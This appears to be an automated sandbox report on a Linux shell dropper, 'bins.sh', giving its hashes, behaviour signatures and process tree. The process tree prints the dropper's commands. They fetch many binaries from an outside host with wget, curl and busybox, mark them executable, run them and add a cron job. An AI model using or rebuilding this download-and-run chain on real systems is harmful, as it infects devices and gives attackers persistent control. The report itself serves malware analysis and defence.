Analysis
-
max time kernel
150s -
max time network
134s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28-10-2024 16:13
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
d41afa47fc6a06a1cfb7b25f1b6510db
-
SHA1
1ef345877ccc2780055713bec262b92657b1e4a1
-
SHA256
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a
-
SHA512
5ce676421868d2fd93aaf0307d70c8f856c56a53859c0275e01f4c1fe15644ee25c18c06208b6e0a579333df7622d73b330cf65c898bb939f2f4fd773f4de320
-
SSDEEP
96:YlFdLqi3SYL4L5RK/VV1oLDfVVjV/VBziTzDYmLxi2mDxTvni6iUpBYKCak8LHbN:SI6/2FO1Y0q0/cl1GC
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 920 chmod 942 chmod 963 chmod 1003 chmod 818 chmod 836 chmod 881 chmod 905 chmod 949 chmod 983 chmod 747 chmod 875 chmod 970 chmod 935 chmod 976 chmod 846 chmod 891 chmod 868 chmod 738 chmod 762 chmod 786 chmod 772 chmod 859 chmod 997 chmod 806 chmod 990 chmod 956 chmod 853 chmod -
Executes dropped EXE 17 IoCs
Processes:
QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQABPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5FVrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAPgMHch4GjkkSXguAzcfaCqm5l4xcEum07N6XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMxQoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQABPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5FVrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAPNxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6QXRShpAHwaUtFsGm29nJnRPcANMtUxbsoMxDVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9lHY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeBgMHch4GjkkSXguAzcfaCqm5l4xcEum07N6ioc pid process /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA 739 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ 748 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F 763 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw 773 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP 807 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 847 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx 869 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA 893 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ 907 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F 922 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw 936 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP 950 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q 957 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx 964 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l 977 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB 984 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 991 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 -
Renames itself 1 IoCs
Processes:
BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQpid process 749 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.I4qxGA crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQcurlcurlcrontabdescription ioc process File opened for reading /proc/848/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/16/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/82/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/825/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/830/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/907/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/988/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/74/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/814/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/432/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/973/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/765/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/777/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/805/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/823/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/892/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/995/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/4/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/699/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/929/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/122/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/844/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/981/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/785/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/967/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/915/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/987/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/8/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/838/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/902/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/318/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/897/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/172/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/834/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/707/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/759/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/789/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/850/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/37/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/674/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/6/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/7/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/775/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/898/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/969/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/filesystems crontab File opened for reading /proc/5/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/842/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/13/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/831/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/881/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/909/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/890/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/939/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/793/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/872/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/804/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/149/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/760/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/685/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/787/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ File opened for reading /proc/853/cmdline BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
busyboxbusyboxwgetcurlbusyboxwgetwgetcurlbusyboxcurlcurlwgetwgetcurlcurlwgetwgetcurlbusyboxcurlbusyboxcurlbusyboxbusyboxbusyboxbusyboxbusyboxwgetwgetcurlbusyboxcurlwgetcurlcurlwgetcurlbusyboxcurlbusyboxbusyboxwgetbusyboxwgetwgetbusyboxbusyboxbusyboxwgetwgetwgetbusyboxwgetbusyboxcurlbusyboxwgetcurlcurlcurlwgetcurlwgetbusyboxpid process 768 busybox 917 busybox 926 wget 940 curl 969 busybox 743 wget 766 wget 851 curl 858 busybox 961 curl 981 curl 856 wget 862 wget 873 curl 899 curl 967 wget 759 wget 830 curl 930 busybox 794 curl 880 busybox 954 curl 962 busybox 1002 busybox 816 busybox 832 busybox 844 busybox 872 wget 884 wget 857 curl 888 busybox 974 curl 812 wget 813 curl 863 curl 715 wget 723 curl 746 busybox 760 curl 796 busybox 867 busybox 878 wget 901 busybox 911 wget 960 wget 783 busybox 955 busybox 996 busybox 939 wget 945 wget 980 wget 982 busybox 1000 wget 736 busybox 1001 curl 975 busybox 791 wget 929 curl 946 curl 968 curl 973 wget 744 curl 777 wget 852 busybox -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxcurlbusyboxbusyboxbusyboxcurlbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxdescription ioc process File opened for modification /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 busybox File opened for modification /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ curl File opened for modification /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q busybox File opened for modification /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP busybox File opened for modification /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l busybox File opened for modification /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA curl File opened for modification /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F busybox File opened for modification /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP busybox File opened for modification /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx busybox File opened for modification /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB busybox File opened for modification /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw busybox File opened for modification /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx busybox File opened for modification /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 busybox File opened for modification /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:723
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:736
-
-
/bin/chmodchmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:743
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:748 -
/bin/shsh -c "crontab -l"3⤵PID:750
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:751
-
-
-
/bin/shsh -c "crontab -"3⤵PID:752
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:753
-
-
-
-
/bin/rmrm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:755
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:760
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Writes file to tmp directory
PID:761
-
-
/bin/chmodchmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:765
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:766
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:767
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:768
-
-
/bin/chmodchmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:776
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:777
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:780
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:783
-
-
/bin/chmodchmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:788
-
-
/bin/rmrm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:790
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:791
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:794
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:796
-
-
/bin/chmodchmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:810
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/chmodchmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:821
-
-
/bin/rmrm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:830
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:832
-
-
/bin/chmodchmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:839
-
-
/bin/rmrm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:843
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:844
-
-
/bin/chmodchmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:850
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:854
-
-
/bin/rmrm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:860
-
-
/bin/rmrm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:867
-
-
/bin/chmodchmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:874
-
-
/bin/chmodchmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:876
-
-
/bin/rmrm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:877
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:882
-
-
/bin/rmrm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:899
-
-
